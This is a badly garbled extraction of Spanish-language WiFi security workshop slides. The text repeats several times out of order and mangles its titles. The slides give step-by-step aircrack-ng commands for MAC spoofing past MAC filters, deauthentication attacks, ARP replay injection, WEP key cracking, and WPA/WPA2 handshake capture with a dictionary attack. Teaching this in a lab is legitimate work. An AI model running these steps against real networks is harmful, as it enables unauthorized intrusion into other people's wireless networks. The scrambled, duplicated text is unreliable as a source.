bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
